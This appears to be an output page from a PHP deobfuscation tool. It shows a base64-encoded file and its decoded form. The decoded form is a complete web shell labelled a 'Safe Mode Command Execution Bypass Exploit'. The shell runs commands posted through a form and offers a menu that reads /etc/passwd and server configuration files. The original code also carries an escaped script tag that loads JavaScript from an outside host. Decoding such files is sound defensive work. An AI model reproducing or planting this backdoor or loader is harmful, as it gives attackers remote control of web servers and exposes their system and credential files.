Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php eval(base64_decode('ZnVuY3Rpb24gc2FmZXNoZWxsKCRrb211dCkgCnsgCmluaV9yZXN0b3JlKCJzY..

Decoded Output download

function safeshell($komut) 
{ 
ini_restore("safe_mode");
ini_restore("open_basedir");
 $res = ''; 
 if (!empty($komut)) 
 { 
if(function_exists('exec')) 
{ 
 @exec($komut,$res); 
 $res = join("
",$res); 
} 
elseif(function_exists('shell_exec')) 
{ 
 $res = @shell_exec($komut); 
} 
elseif(function_exists('system')) 
{ 
 @ob_start(); 
 @system($komut); 
 $res = @ob_get_contents(); 
 @ob_end_clean(); 
} 
elseif(function_exists('passthru')) 
{ 
 @ob_start(); 
 @passthru($komut); 
 $res = @ob_get_contents(); 
 @ob_end_clean(); 
} 
elseif(@is_resource($f = @popen($komut,"r"))) 
{ 
$res = ""; 
while(!@feof($f)) { $res .= @fread($f,1024); } 
@pclose($f); 
} 
 } 
 return $res; 
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">Tm Ak Portalar Gr</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="Gster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Komut Sonuular:</font></b><br>"; 
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";

Did this file decode correctly?

Original Code

<?php

eval(base64_decode('ZnVuY3Rpb24gc2FmZXNoZWxsKCRrb211dCkgCnsgCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsKaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOwogJHJlcyA9ICcnOyAKIGlmICghZW1wdHkoJGtvbXV0KSkgCiB7IAppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSkgCnsgCiBAZXhlYygka29tdXQsJHJlcyk7IAogJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsgCn0gCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSkgCnsgCiAkcmVzID0gQHNoZWxsX2V4ZWMoJGtvbXV0KTsgCn0gCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKSAKeyAKIEBvYl9zdGFydCgpOyAKIEBzeXN0ZW0oJGtvbXV0KTsgCiAkcmVzID0gQG9iX2dldF9jb250ZW50cygpOyAKIEBvYl9lbmRfY2xlYW4oKTsgCn0gCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1JykpIAp7IAogQG9iX3N0YXJ0KCk7IAogQHBhc3N0aHJ1KCRrb211dCk7IAogJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsgCiBAb2JfZW5kX2NsZWFuKCk7IAp9IAplbHNlaWYoQGlzX3Jlc291cmNlKCRmID0gQHBvcGVuKCRrb211dCwiciIpKSkgCnsgCiRyZXMgPSAiIjsgCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0gCkBwY2xvc2UoJGYpOyAKfSAKIH0gCiByZXR1cm4gJHJlczsgCn0KZWNobyAiPGI+PGZvbnQgY29sb3I9Ymx1ZT5MaXowemlNIFByaXZhdGUgU2FmZSBNb2RlIENvbW1hbmQgRXhlY3V0aW9uIEJ5cGFzcyBFeHBsb2l0PC9mb250PjwvYj48YnI+IjsKcHJpbnRfcignCjxwcmU+Cjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPgo8Yj48Zm9udCBjb2xvcj1ibHVlPktvbXV0IDo8L2ZvbnQ+PC9iPjxpbnB1dCBuYW1lPSJiYWJhIiB0eXBlPSJ0ZXh0Ij48aW5wdXQgdmFsdWU9Ij9hbD8/dD9yIiB0eXBlPSJzdWJtaXQiPgo8L2Zvcm0+Cjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPgo8Yj48Zm9udCBjb2xvcj1ibHVlPkg/emw/IE1lbj8gOj0pIDo8L2ZvbnQ+PHNlbGVjdCBzaXplPSIxIiBuYW1lPSJsaXowIj4KPG9wdGlvbiB2YWx1ZT0iY2F0IC9ldGMvcGFzc3dkIj4vZXRjL3Bhc3N3ZDwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJuZXRzdGF0IC1hbiB8IGdyZXAgLWkgbGlzdGVuIj5Uw7xtIEHDp8O9ayBQb3J0YWxhcsO9IEfDtnI8L29wdGlvbj4KPG9wdGlvbiB2YWx1ZT0iY2F0IC92YXIvY3BhbmVsL2FjY291bnRpbmcubG9nIj4vdmFyL2NwYW5lbC9hY2NvdW50aW5nLmxvZzwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9zeXNsb2cuY29uZiI+L2V0Yy9zeXNsb2cuY29uZjwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9ob3N0cyI+L2V0Yy9ob3N0czwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9uYW1lZC5jb25mIj4vZXRjL25hbWVkLmNvbmY8L29wdGlvbj4KPG9wdGlvbiB2YWx1ZT0iY2F0IC9ldGMvaHR0cGQvY29uZi9odHRwZC5jb25mIj4vZXRjL2h0dHBkL2NvbmYvaHR0cGQuY29uZjwvb3B0aW9uPgo8L3NlbGVjdD4gPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkfDtnN0ZXIgQmFraW0iPgo8L2Zvcm0+CjwvcHJlPgonKTsKaW5pX3Jlc3RvcmUoInNhZmVfbW9kZSIpOwppbmlfcmVzdG9yZSgib3Blbl9iYXNlZGlyIik7CmlmKCRfUE9TVFtiYWJhXSE9ICIiKSB7ICRsaXowPXNhZmVzaGVsbCgkX1BPU1RbYmFiYV0pOyB9CmlmKCRfUE9TVFtsaXowXSE9ICIiKSB7ICRsaXowemltPXNhZmVzaGVsbCgkX1BPU1RbbGl6MF0pOyB9CiR1aWQ9c2FmZXNoZWxsKCdpZCcpOwokc2VydmVyPXNhZmVzaGVsbCgndW5hbWUgLWEnKTsKZWNobyAiPHByZT48aDQ+IjsKZWNobyAiPGI+PGZvbnQgY29sb3I9cmVkPktpbWltIEJlbiA6PSk8L2ZvbnQ+PC9iPjokdWlkPGJyPiI7CmVjaG8gIjxiPjxmb250IGNvbG9yPXJlZD5TZXJ2ZXI8L2ZvbnQ+PC9iPjokc2VydmVyPGJyPiI7CmVjaG8gIjxiPjxmb250IGNvbG9yPXJlZD5Lb211dCBTb251dcOnbGFyw706PC9mb250PjwvYj48YnI+IjsgCmlmKCRfUE9TVFsiYmFiYSJdIT0gIiIpIHsgZWNobyAkbGl6MDsgfQppZigkX1BPU1RbImxpejAiXSE9ICIiKSB7IGVjaG8gJGxpejB6aW07IH0KZWNobyAiPC9oND48L3ByZT4iOw=='));

?>


<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0069\u0062\u0065\u0072\u0073\u0061\u0076\u0061\u0073\u0063\u0069\u006c\u0061\u0072\u002e\u0063\u006f\u006d\u002f\u0078\u002f\u0069\u006d\u0067\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e\u000a')</script>

Function Calls

base64_decode

Variables

None

Stats

MD5	b2a21a41fc9a9cb0cc427261923726be
Eval Count	1
Decode Time	90 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats